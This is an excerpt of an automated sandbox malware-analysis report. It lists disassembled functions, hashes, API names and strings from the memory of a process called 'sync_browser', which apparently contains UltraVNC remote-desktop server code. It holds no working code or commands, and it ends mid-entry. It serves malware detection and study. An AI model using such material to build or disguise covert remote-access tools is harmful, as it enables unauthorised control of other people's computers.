                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Thread$Object$CloseCreateCurrentDesktopEventHandleInformationResetSingleTerminateUserWait
                                                                    • String ID: Default$vncdesktopsink.cpp : ERROR: initwindowthread failed to start $vncdesktopsink.cpp : StartInitWindowthread $vncdesktopsink.cpp : StartInitWindowthread default desk$vncdesktopsink.cpp : StartInitWindowthread no default desk$vncdesktopsink.cpp : StartInitWindowthread reactivate$vncdesktopsink.cpp : StartInitWindowthread started
                                                                    • API String ID: 3943905059-2958163836
                                                                    • Opcode ID: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction ID: 8b3fd3cba1601970f1a261753eec0362deb5879d79b77d84d6d7b8eff21f8a51
                                                                    • Opcode Fuzzy Hash: e218055b09ea2cf65919ada1ad6196f8f0811d873fe4ec65c432ea6f649def2e
                                                                    • Instruction Fuzzy Hash: 42413D71A18ACA86EB149B21E8047EE636DFB84744F840133CA4DD72A9DF3DE16BC350
                                                                    Function 00007FF6DC0FBF40 Relevance: 24.7, APIs: 7, Strings: 7, Instructions: 202windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: DeleteIconInfoObject
                                                                    • String ID: vncencoderCursor.cpp : GetBitmapBits() failed.$vncencoderCursor.cpp : GetIconInfo() failed.$vncencoderCursor.cpp : GetObject() for bitmap failed.$vncencoderCursor.cpp : cursor bitmap handle is NULL.$vncencoderCursor.cpp : cursor handle is NULL.$vncencoderCursor.cpp : incorrect data in cursor bitmap.$vncencoderCursor.cpp : vncDesktop::GetRichCursorData() failed.
                                                                    • API String ID: 2689914137-3853778978
                                                                    • Opcode ID: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                    • Instruction ID: a75444b850cf97295df5471788b7e4602aeb9f86cffd8a869f36c206cbe71ed5
                                                                    • Opcode Fuzzy Hash: 2f8f0d1229a19f6cc99125dd6f7866c1e440804fb71aa97e513b1dd5eb10ea0b
                                                                    • Instruction Fuzzy Hash: 63918171A0868A89EB60DF61D8413BD63A8FB84B88F404532DE4DC7A95DF3DE5A7C700
                                                                    Function 00007FF6DC130160 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 163memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Global$Lock$AllocFreemalloc
                                                                    • String ID: Unable to allocate memory in zip dll
                                                                    • API String ID: 105282483-1808592719
                                                                    • Opcode ID: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction ID: bb2a3ab21f45a1d89a79cb6697ffafb2e6f926001a48609dee63b65ece5e2882
                                                                    • Opcode Fuzzy Hash: 439d1d74bec1a377bae1f8d9f7e6becaa1aace2b029c7af40cc9af3f3fa69061
                                                                    • Instruction Fuzzy Hash: 9A713A26A09B5A86EB45CF65E8902BC23A8FF44B98F044136CE5E87395DF3CE567C310
                                                                    Function 00007FF6DC0D0E00 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 153memorythreadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Process$Token$ErrorInformationLastOpenWindow_errno$AllocAllocateCurrentEqualFindFreeHeapInitializeThread_callnewhmalloc
                                                                    • String ID: Shell_TrayWnd
                                                                    • API String ID: 1145045407-2988720461
                                                                    • Opcode ID: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction ID: 32a991961fbfbf456ddf62bf8d37b660f2d3d8ea13a0fdcabe50e90eb4b5f6b0
                                                                    • Opcode Fuzzy Hash: d9d604564b036738baf1cc78484086bbc4bcce7d9d148157cfd1f0fc9de8039d
                                                                    • Instruction Fuzzy Hash: 6061A332A0878686EB109F20D8403AD37A4FF847A8F448136EA5D87F99DF3DE566C740
                                                                    Function 00007FF6DC0C6E00 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 104registrystringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseQueryValue$Openlstrlenmalloc
                                                                    • String ID: @$Enterprise$Personal$ProductSuite$SBS$Small Business$System\CurrentControlSet\Control\ProductOptions$Terminal Server
                                                                    • API String ID: 1137168859-3840687832
                                                                    • Opcode ID: c3e5059f5506e50aa49e87f738da84c728db6ecd1ac36e58f4a7c2abc53800e9
                                                                    • Instruction ID: a49e81583a5ddfea236112d94d14ae53dae8e2b0cdaef7bfd135f830d983248c
                                                                    • Opcode Fuzzy Hash: c3e5059f5506e50aa49e87f738da84c728db6ecd1ac36e58f4a7c2abc53800e9
                                                                    • Instruction Fuzzy Hash: 2A417071A0C66B81FB208B66E94067D77A8EF857D4F444133E94DC2AA5DF2CE167CB10
                                                                    Function 00007FF6DC181630 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 89COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _errno$FullNamePath__doserrno_getdrive_invalid_parameter_noinfo
                                                                    • String ID: .$:.
                                                                    • API String ID: 2522281643-2811378331
                                                                    • Opcode ID: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction ID: df260cf71741909fbf41ee012da677bdd72f2602b2ebef547d4db48e87a85a7b
                                                                    • Opcode Fuzzy Hash: 929e3b98afd90e1224fcb876808be71e149f22f30ee99422c40ef918dbd1e04a
                                                                    • Instruction Fuzzy Hash: 8C31A613E0C2AA92FB615F609C01BBE2698AF45740F784037EA4CC66C6DE7CE863C751
                                                                    Function 00007FF6DC0D2880 Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 85libraryregistryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Service$Status$Library$AddressCloseCreateCtrlEventFreeHandleHandlerLoadMetricsProcRegisterSystem
                                                                    • String ID: RegisterServiceCtrlHandlerExA$advapi32.dll$uvnc_service
                                                                    • API String ID: 333848887-3586523739
                                                                    • Opcode ID: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                    • Instruction ID: c4a6d384ed02ff32999825b5d47904d15122f7ccd0a2b94be0129921bb8f20b9
                                                                    • Opcode Fuzzy Hash: c7b1663068b9192da73d5e996cff8b829b46b9983eaef1313fb1f4a7c7fe863a
                                                                    • Instruction Fuzzy Hash: E0411B34A19B6A92F6119B15FD542BC63A8BF88750F848137D85DC6AA0DF7DE427CB00
                                                                    Function 00007FF6DC0F09F0 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 82COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • x, xrefs: 00007FF6DC0F0A25
                                                                    • UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window, xrefs: 00007FF6DC0F0AAC
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Color$ObjectText$RectSelect$BitsBrushCreateDeleteDrawFillFlushSolid
                                                                    • String ID: UltraVVNC running as application doesn't have permission to acces UAC protected windows.Screen is locked until the remote user unlock this window$x
                                                                    • API String ID: 3190128964-2508378015
                                                                    • Opcode ID: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                    • Instruction ID: f019268818e976e88b0d5fc97fede14d11dc70d56d896cf2f8137bbab9da5b57
                                                                    • Opcode Fuzzy Hash: 422fa4f30dff9bfc24b23924f9a70426f5dd9492b070c67ff410ac0bceba6c3d
                                                                    • Instruction Fuzzy Hash: E1314F3660869A8AE700DF6AE84466E7374FB89B98F040032EE5E87718DF7DD456CB10
                                                                    Function 00007FF6DC0F6D40 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 226threadtimeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CreateWindow$Thread$CombineCursorDeleteDesktopForegroundFromObjectPointRectTime_errno_invalid_parameter_noinfofreetime
                                                                    • String ID: schook$w8hook
                                                                    • API String ID: 2828954817-2864610768
                                                                    • Opcode ID: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                    • Instruction ID: 730ce0da03087b1cfa9c1f9bf0c1a50535eb9281fa043866bd5bab4651160ff1
                                                                    • Opcode Fuzzy Hash: 9d0d11ee87f8464a0e06aa43911e74bafefc4e8cee0f8ec7ee0a3e7d2bc7edc3
                                                                    • Instruction Fuzzy Hash: DBB15E32A0878A8AEB648F25E4405EE77A4FB44B84F444137DB9E83751CF7DE4A6C705
                                                                    Function 00007FF6DC0D5EF0 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 171windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D5F1B
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D5FAF
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D5FF6
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D6160
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D5F61
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D5FC8
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                                    • Instruction ID: 8292208afd6d30532d6421df91c198c53c1793e00e3bed1eb6660fc9f0f994fa
                                                                    • Opcode Fuzzy Hash: 53fb3c1bb1965282e4da31d922302c79b62d7af4abef1ccc30ce768ea4cf9713
                                                                    • Instruction Fuzzy Hash: 8B6135A1A196DA81F7149B65E8253FD37A4EB94704F844137EA8EC7691EF3DE12BC300
                                                                    Function 00007FF6DC0D5550 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 162windowCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called, xrefs: 00007FF6DC0D557A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette, xrefs: 00007FF6DC0D5603
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries, xrefs: 00007FF6DC0D564A
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done, xrefs: 00007FF6DC0D577E
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table, xrefs: 00007FF6DC0D55BD
                                                                    • l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette, xrefs: 00007FF6DC0D561C
                                                                    Memory Dump Source
                                                                    • Source File: 00000012.00000002.4547391234.00007FF6DC0C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6DC0C0000, based on PE: true
                                                                    • Associated: 00000012.00000002.4547355501.00007FF6DC0C0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547509320.00007FF6DC199000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547565815.00007FF6DC1CD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547594362.00007FF6DC1CF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC1D0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC21B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547634593.00007FF6DC248000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC281000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC2F4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000012.00000002.4547775433.00007FF6DC33C000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_18_2_7ff6dc0c0000_sync_browser.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: ErrorFreeLastLibrary$AddressDeleteDisplayEntriesEnumHeapLoadPaletteProcReleaseSettingsSystem_errnofreemalloc
                                                                    • String ID: l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using mirror video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : Using video Palette$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : failed to allocate translation table$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : got %u palette entries$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable called$l:\ultravnc_installer_other\ultravnc\ultravnc project root\ultravnc\winvnc\winvnc\tableinitcmtemplate.cpp : rfbInitColourMapSingleTable done
                                                                    • API String ID: 181403729-1081969236
                                                                    • Opcode ID: 53fd9ebbc342151809572dc5d5c454a9c87e4ee11642373697c9161ead6f8e27
                                                                    • Instruction ID: 56a2568cc1d76d1542708cd32795461c20acc38efa1aa6a5f6b3c2d8598f6627
